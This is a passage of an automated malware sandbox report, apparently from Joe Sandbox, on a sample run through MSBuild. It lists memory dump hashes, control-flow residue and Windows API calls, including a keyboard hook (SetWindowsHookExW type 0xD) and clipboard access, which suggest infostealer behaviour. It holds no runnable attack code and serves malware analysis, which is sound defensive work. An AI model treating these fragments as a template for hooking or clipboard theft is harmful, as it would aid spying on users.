• Instruction ID: 2917ffaf0d274ce794d2f04423c3a24101127c02141d20d7bb85de7315f05eb3
• Opcode Fuzzy Hash: 7afd33ad35d1dd841fbfd7da1638268aa1b243330217a932b5ff669c9a7765e0
• Instruction Fuzzy Hash: 6E2103B2504244EFDB11DF54D8C0B2ABF65FBC8328F68C669E9058B247C336D956CAE1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 235df6b4cd6d61dbbbc39c93e22e773188e4ebd6c80fc405396ef3ae16d97df3
• Instruction ID: d5742540d689698d9a6bd7884f03088c39b5d300fb3b90f907163848536d7842
• Opcode Fuzzy Hash: 235df6b4cd6d61dbbbc39c93e22e773188e4ebd6c80fc405396ef3ae16d97df3
• Instruction Fuzzy Hash: 5E213771604348EFDB01DF94C5C0B26BBA1FB84328F20C76DE9098B346CB36E906CA61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e4d29fa8db24db5720e54c8388d7152d917b2f614e129f3458fdf8f47037f7ce
• Instruction ID: f0390a7bd68adcdce4dc1cf3a848675657738a1087a87baa007d43ce0d1053fe
• Opcode Fuzzy Hash: e4d29fa8db24db5720e54c8388d7152d917b2f614e129f3458fdf8f47037f7ce
• Instruction Fuzzy Hash: A8213771504348DFCB15DF94D4C0B26BB61FB94358F20C66DE9098B346CB3AD907CA61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bf02d69050becd3d46a1a83d3057079996056aa0a7a8d5a39dcc4e83b01ae8c
• Instruction ID: 724ff531289f8917dcb63ca8f4eb9037b10ea02a1aaf336a7a5f1e8d7d7e9ea4
• Opcode Fuzzy Hash: 5bf02d69050becd3d46a1a83d3057079996056aa0a7a8d5a39dcc4e83b01ae8c
• Instruction Fuzzy Hash: E411E172504280DFCB02CF54D5C0B16BF71FB84324F28C6A9E8044B656C33AD55ACBA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
• Instruction ID: d01060aea45babe8177b35db272c1c8eb187684f2316b00c7889b45beac5cbc7
• Opcode Fuzzy Hash: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
• Instruction Fuzzy Hash: 5411BB75504284DFCB12CF54D5C4B15BBA1FB84324F28C6AAD8098B656C33AD54ACBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317087042.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_184d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
• Instruction ID: a7cae0789dc28972f3722930a023235d9bb627ba3f25520a26b2d523966a84b6
• Opcode Fuzzy Hash: 41da564a32cfcb17e8aee11d37f4cd59d2fe07592e37ba257263d42355370bb4
• Instruction Fuzzy Hash: 2011BB75904284DFCB02DF54C5C4B15BBA1FB84324F28C6A9D8498B656C33AE44ACB61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d36d2055a8dbeba7e159c79c3c93ddc663cd35d36a09215ef979aecc2a4c36f
• Instruction ID: d1c3daa38b320fa959a7a694585c40ede1468395a56e6377ed8d85b95bce804d
• Opcode Fuzzy Hash: 3d36d2055a8dbeba7e159c79c3c93ddc663cd35d36a09215ef979aecc2a4c36f
• Instruction Fuzzy Hash: 44012B714083C49AE7125E65CCC4B6ABF9CEF81378F4CC65AEE049B246D3799944CAF1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 259f96b033868cb4a618f27a4df6538bc91094a3082aff60b89c94057fa69e98
• Instruction ID: 97a1e2fa6dfd3855f853b3f691f01fa1de42acaa0c266b87626cee4909bb5b04
• Opcode Fuzzy Hash: 259f96b033868cb4a618f27a4df6538bc91094a3082aff60b89c94057fa69e98
• Instruction Fuzzy Hash: 6CF0AFF5D4434AABDFD1EFB8E84979E7FE0AB11200F408866D454E2202E77496959B41
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317037035.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_183d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36eba70fcde5bf537dcaa8b5bc9963f4059e7bef770b230a059bc90b69d6bbd7
• Instruction ID: bd61cc2bd165ccf68f9c2e5bb4576da4672ce1fde6b84ced8ae237e4a043f70c
• Opcode Fuzzy Hash: 36eba70fcde5bf537dcaa8b5bc9963f4059e7bef770b230a059bc90b69d6bbd7
• Instruction Fuzzy Hash: E8F062714053C49AEB118E5ADCC4B66FF98EB81774F18C55AED085B286C3799844CAB1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6e722860c7ea6820141f5a23ba3e8113d3b9b0e2229e7c4f554b82f8655ec506
                                                                                                                                        • Instruction ID: d610f7edb037f7f8e854b195faf1b6017875465370722fbdc0e41a1cbc779095
                                                                                                                                        • Opcode Fuzzy Hash: 6e722860c7ea6820141f5a23ba3e8113d3b9b0e2229e7c4f554b82f8655ec506
                                                                                                                                        • Instruction Fuzzy Hash: FFF0DAB0D0430ADFDB44DFA9D846AAEBFF4BF48310F1045A9D918E7301E77096408B90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4f7d7ab59c544ed4f4eaffba1a2b77f0dfcb0d64a33fa2efb548365638c264af
                                                                                                                                        • Instruction ID: 9c7eeca2f6b73608cd14a67f96ec5802474dfdd30d32909ed154751bb82e4249
                                                                                                                                        • Opcode Fuzzy Hash: 4f7d7ab59c544ed4f4eaffba1a2b77f0dfcb0d64a33fa2efb548365638c264af
                                                                                                                                        • Instruction Fuzzy Hash: 34F06DF4E0434ADFEB14CF65C845AAEBFF0EF45220F0045A9E0A1D7391D77486418B81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1a02c122f6f0b845973249e43da9f1853009aa90143536d1457c1d6b962d9455
                                                                                                                                        • Instruction ID: 83edf379d469e819d9aa61821ad2a6c8ad78a0d6545715369ed839a26d3c5f41
                                                                                                                                        • Opcode Fuzzy Hash: 1a02c122f6f0b845973249e43da9f1853009aa90143536d1457c1d6b962d9455
                                                                                                                                        • Instruction Fuzzy Hash: 73E092B5E403429FDB50DB78C95D94A7FF1EB09224F5586A5D0A5CB3A1EB3445039F02
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c2edac5d5cca287319f32b5bd1f13a38fe91f91998fa070ef2e33b037bb8f6e9
                                                                                                                                        • Instruction ID: 7f8413abb054db84dbde281cb06575e6d9b5df4c603ff115a5cfa569607178d6
                                                                                                                                        • Opcode Fuzzy Hash: c2edac5d5cca287319f32b5bd1f13a38fe91f91998fa070ef2e33b037bb8f6e9
                                                                                                                                        • Instruction Fuzzy Hash: 26E0B6B0D4020ADFDB80EFB9C909A5EBFF1BF08600F1185B9D019E7211EB7496458F91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 54eb29295af36d733c6e956d76c2ab8025f654570336458c8b3c31d9c04c3089
                                                                                                                                        • Instruction ID: 318b65d650b95adba19ad5191d8b080fca6464e636a192f0f32ef4a305caadd4
                                                                                                                                        • Opcode Fuzzy Hash: 54eb29295af36d733c6e956d76c2ab8025f654570336458c8b3c31d9c04c3089
                                                                                                                                        • Instruction Fuzzy Hash: 66D012332402099E4F41FA94F849C5277DDBB246007148432E944C6021E621E574E756
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                        • Opcode ID: 2c8e647c883a1f82b9d5a61893efb0b9a6c38fd393bfc690ddac9d7687373395
                                                                                                                                        • Instruction ID: 448ded15bf6a3917f59d201d7d4a7b0c4a24088979799eeb8a08317bb569c1c7
                                                                                                                                        • Opcode Fuzzy Hash: 2c8e647c883a1f82b9d5a61893efb0b9a6c38fd393bfc690ddac9d7687373395
                                                                                                                                        • Instruction Fuzzy Hash: 6F5170B1E056589BEB5CCF6BCD4078EFAF7AFC9205F18C1BA950CA6254EB3109958F01
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 97a4e72e706a60310723af1929c7564536f48d8f84ceecd4d183a7b84e8b0ff2
                                                                                                                                        • Instruction ID: 7d70ce6776d604e88a3b8611ca8f8fddf8cace324e58b379c9d9c01aae220ec6
                                                                                                                                        • Opcode Fuzzy Hash: 97a4e72e706a60310723af1929c7564536f48d8f84ceecd4d183a7b84e8b0ff2
                                                                                                                                        • Instruction Fuzzy Hash: 6112B8F1811746CAE310EF65F99C189BBA1F746328BB0D328D2652B6DDD7B8114ACF84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fcbe848a9cd30f45e47b9318f7aafd3a4404e9c5f7304ed9f6b0152be5dab0d5
                                                                                                                                        • Instruction ID: 53192530574d5f7f55e5f479acebac59a4194dccf61d80a170646f043c33faee
                                                                                                                                        • Opcode Fuzzy Hash: fcbe848a9cd30f45e47b9318f7aafd3a4404e9c5f7304ed9f6b0152be5dab0d5
                                                                                                                                        • Instruction Fuzzy Hash: 01A17036E2031A8FCF05DFB5C8445DEB7B2FF85301B15856AE805BB261EB71AA85CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7a1cd14e47934e3791e6f438312338e39b592d84a5437c1d97861ed90a37a5c1
                                                                                                                                        • Instruction ID: 80018de15755a1dbd1fc1e50bee8a9b7f4db1aa948e396acda77410f0ed6a98a
                                                                                                                                        • Opcode Fuzzy Hash: 7a1cd14e47934e3791e6f438312338e39b592d84a5437c1d97861ed90a37a5c1
                                                                                                                                        • Instruction Fuzzy Hash: B2C108B1811746CAE710EF65F89C199BBB1FB86328F70C329D1612B6D8D7B8154ACF84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f27633f7e4c9f7e25bf9725aa6cc3c9a8fc8824990e65f1543fd7da069c1f668
                                                                                                                                        • Instruction ID: 10c584c26d8a08be33f7bdf1272aedc54a924fb1d3e69737366ac1aec21b981b
                                                                                                                                        • Opcode Fuzzy Hash: f27633f7e4c9f7e25bf9725aa6cc3c9a8fc8824990e65f1543fd7da069c1f668
                                                                                                                                        • Instruction Fuzzy Hash: D74153B1E056549BE75CCF6B8D402CAFBF7AFC9200F18C1BAD54CAA215EB3505568F11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                         Execution Coverage: 15%
                                                                                                                                         Dynamic/Decrypted Code Coverage: 100%
                                                                                                                                         Signature Coverage: 2.7%
                                                                                                                                         Total number of Nodes: 258
                                                                                                                                         Total number of Limit Nodes: 24
                                                                                                                                        execution_graph 48098 12148c0 48099 12148d4 48098->48099 48102 1214b0a 48099->48102 48108 1214bf0 48102->48108 48112 1214bdf 48102->48112 48116 1214cec 48102->48116 48120 1214d06 48102->48120 48109 1214c34 48108->48109 48110 1214d2b 48109->48110 48124 1214fe7 48109->48124 48113 1214bf0 48112->48113 48114 1214d2b 48113->48114 48115 1214fe7 2 API calls 48113->48115 48115->48114 48117 1214c9f 48116->48117 48118 1214d2b 48117->48118 48119 1214fe7 2 API calls 48117->48119 48119->48118 48121 1214d19 48120->48121 48122 1214d2b 48120->48122 48123 1214fe7 2 API calls 48121->48123 48123->48122 48125 1215006 48124->48125 48129 1215048 48125->48129 48133 1215038 48125->48133 48126 1215016 48126->48110 48130 1215082 48129->48130 48131 12150d5 48130->48131 48132 12150ac RtlEncodePointer 48130->48132 48131->48126 48132->48131 48134 1215048 48133->48134 48135 12150ac RtlEncodePointer 48134->48135 48136 12150d5 48134->48136 48135->48136 48136->48126 48137 6879860 48138 687986b 48137->48138 48139 687987b 48138->48139 48141 6878c0c 48138->48141 48142 68798b0 OleInitialize 48141->48142 48143 6879914 48142->48143 48143->48139 47941 6873088 47942 6873099 47941->47942 47944 68730bc 47941->47944 47943 68730e6 47944->47943 47949 6872330 47944->47949 47946 6873346 47947 6872330 2 API calls 47946->47947 47948 6873386 47947->47948 47950 6872355 47949->47950 47951 687238f 47950->47951 47954 6872757 47950->47954 47959 6872768 47950->47959 47951->47946 47955 6872768 47954->47955 47963 6872791 47955->47963 47972 68727a0 47955->47972 47956 6872776 47956->47951 47961 6872791 2 API calls 47959->47961 47962 68727a0 2 API calls 47959->47962 47960 6872776 47960->47951 47961->47960 47962->47960 47964 68727d5 47963->47964 47965 68727ad 47963->47965 47970 6872791 GlobalMemoryStatusEx 47964->47970 47971 68727a0 GlobalMemoryStatusEx 47964->47971 47965->47956 47966 68727f2 
callgraph (edge-list rendering residue, condensed): remaining nodes cover functions at 68727a0/6872791/68728be/6872320/6872330 (GlobalMemoryStatusEx), 67faba3 and 67fcdc4 (LdrInitializeThunk), 687219c/68721ac/68722d4/6874c50/6874cd2/6874d00/6874e61/6874e70/68751b0 (GetModuleHandleW), 6877c68 (DuplicateHandle), 121cc70 (LoadLibraryA), 68722ac/68793c8/6879688/6879df8 (OleGetClipboard), 6878fba (CallWindowProcW), 68761f8 (CreateWindowExW), 687bd00 (SetWindowsHookExW), 6879320 (KiUserCallbackDispatcher)
Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e47027345b0cd0c56a758076d1af6a38e3f764b1c74223f1a1600afa9f13bc3e
• Instruction ID: c2ff6efa80908379fd6e217cf9d5323740a20475ff112869a1ec0e8bdd93f1de
• Opcode Fuzzy Hash: e47027345b0cd0c56a758076d1af6a38e3f764b1c74223f1a1600afa9f13bc3e
• Instruction Fuzzy Hash: 0A63FB31D1061A8ECB51EF68C884AA9F7B1FF99310F15D79AE45877221EB70AAC4CF41
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c0d748e52e1974b4efda69c22fba5b155e86c1e6dbf0f97f04307b0dcc8f76b
• Instruction ID: a0e222c7df623d5b0a438f365cd370603c4091cc659582ffacb41af989c00708
• Opcode Fuzzy Hash: 5c0d748e52e1974b4efda69c22fba5b155e86c1e6dbf0f97f04307b0dcc8f76b
• Instruction Fuzzy Hash: 7B531F31D1061A8ECB51EF68C8846A9F7B1FF99310F15D79AE458B7221EB70AAC4CF41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• control_flow_graph (rendering residue, condensed): function at 67fc640, basic blocks through 67fd1c5; calls 67f3694, 67f36a0, 67f36ac, 67f36b8, 67f36c4 and LdrInitializeThunk (block 67fcd99-67fcdd3)
APIs
Memory Dump Source
• Source File: 00000009.00000002.531002054.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67f0000_MSBuild.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 24f0107c42eaf1480dab9072e294e305a0f18c7145d7f652ca3fa439178e8c4e
• Instruction ID: d96ca7bb13edf7270af94fef86b86c91f1001b061c7e665255df0505346b3e99
• Opcode Fuzzy Hash: 24f0107c42eaf1480dab9072e294e305a0f18c7145d7f652ca3fa439178e8c4e
• Instruction Fuzzy Hash: CC622975E006198FCB64EFB8C85469DB7F1AF89304F118AA9D54AAB350EF349D85CF80
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• control_flow_graph (rendering residue, condensed): function at 687b0f8, basic blocks through 687bdb1; calls SetWindowsHookExW (block 687bd56-687bd88)
APIs
• SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0687BD7B
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: 8f0cbd390e2b783533ba39a548baa2771c2cc1f90c05633ae8428f3b4be8d795
• Instruction ID: 4293cf41312d55cb54292ce5f617ba6ad935f8d0579b9b9a9d978ba19fb34c26
• Opcode Fuzzy Hash: 8f0cbd390e2b783533ba39a548baa2771c2cc1f90c05633ae8428f3b4be8d795
• Instruction Fuzzy Hash: 012135B1D002099FCB50CF99C844BEEBBF5FF88314F148429E459A7250DB74A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b2e812fcceb497efa4964860276c05802a9e2fa34d52f9b0cd50e1a3760e5e2
• Instruction ID: f0f84be0ca1c5d13295c3a7775843f08e794a81a093aac78e73a869235ab9c7e
• Opcode Fuzzy Hash: 2b2e812fcceb497efa4964860276c05802a9e2fa34d52f9b0cd50e1a3760e5e2
• Instruction Fuzzy Hash: CB520F70B002199FDB15DBB4C894BAEBBF6AF89304F158969E506EB391DB34DC01CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8add08181a5dba98cbd35c72f5d47722757ecfa166dbae0468eb77bd3ff5cea3
• Instruction ID: d9a6c1c4584c76cc8263e5615ce1d38b12fbaae71a8e3178f4745081ab4907ba
• Opcode Fuzzy Hash: 8add08181a5dba98cbd35c72f5d47722757ecfa166dbae0468eb77bd3ff5cea3
• Instruction Fuzzy Hash: 83F19B70F002199FDB54DBA8C894BAEB7F6AF88704F158969E505EB395DB34EC01CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• control_flow_graph (rendering residue, condensed): function at 67faaf0, basic blocks through 67fad2e; calls 67f90b0 and 67f91c8 (block 67fab34-67fab87) and LdrInitializeThunk (block 67faba3-67fabba)
APIs
Memory Dump Source
• Source File: 00000009.00000002.531002054.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67f0000_MSBuild.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e399008bc9b28cbcfe160473d0c6288fa139b24893118514caa827da23d92679
• Instruction ID: baf8fe48dbba198e7167f63edcb03bd1bccfe92694251357a01f43fa375c3597
• Opcode Fuzzy Hash: e399008bc9b28cbcfe160473d0c6288fa139b24893118514caa827da23d92679
• Instruction Fuzzy Hash: 4651D331E102069FCB44EF74D899AAEB7F6AF45204F148A79E605EB395DF34E804CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• control_flow_graph (rendering residue, condensed): function at 67fab50, basic blocks through 67fad2e; calls 67f90b0, 67f91c8 and LdrInitializeThunk (block 67fab50-67fabba)
APIs
Memory Dump Source
• Source File: 00000009.00000002.531002054.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67f0000_MSBuild.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e8b7465e6cb772e16162edcd5a6d09ae8543e110b8de41943311c253aeb31e22
• Instruction ID: 97767d7620fe548ad49d9ca604d6b1b9a85580a222b4fb5d2f5a9c776cae175f
• Opcode Fuzzy Hash: e8b7465e6cb772e16162edcd5a6d09ae8543e110b8de41943311c253aeb31e22
• Instruction Fuzzy Hash: 0D51C631E102069FCB54EFB0D898AAEB7F5BF84204B148A39E616DB354DF34E804CB91
Uniqueness

Uniqueness Score: -1.00%
Control-flow Graph

• control_flow_graph (rendering residue, condensed): function at 68727a0, basic blocks through 687291d; calls 6872791 or itself at 68727ed, and GlobalMemoryStatusEx (block 687285f-68728ec)
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 45c34bdd71c01ef9da638c9dba4d03f643fdceb8d1850bc1b27b2c5fbad1b541
• Instruction ID: b6b7af68ac64c9b05b34ee3ed0b3e4ef21168f2bc1b919fc5c3de9cbd3ce40ef
• Opcode Fuzzy Hash: 45c34bdd71c01ef9da638c9dba4d03f643fdceb8d1850bc1b27b2c5fbad1b541
• Instruction Fuzzy Hash: A841E372D043598FCB00DFA9D8443DEBBB5EF89214F15856AD508E7241EB389945CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 6876184-6876301; calls CreateWindowExW in block 6876253-68762b2
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068762A2
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: d4992743f67a564e068d7e421f430d7db23dd20053db602d66815db49c77d180
• Instruction ID: bef1f179d545fb46739620c0dffe9db85b9b455aebea6a75932bd41def0e69f3
• Opcode Fuzzy Hash: d4992743f67a564e068d7e421f430d7db23dd20053db602d66815db49c77d180
• Instruction Fuzzy Hash: D051C0B1D103499FDF54CFA9C884ADEBBB5FF48314F24812AE819AB250E7759885CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 6876190-6876301; calls CreateWindowExW in block 6876213-68762b2
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068762A2
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 08ef4b98fa5dd6ecb4fb5e5133bbe36d0288d71cb8a36caa5ad9246b3a081261
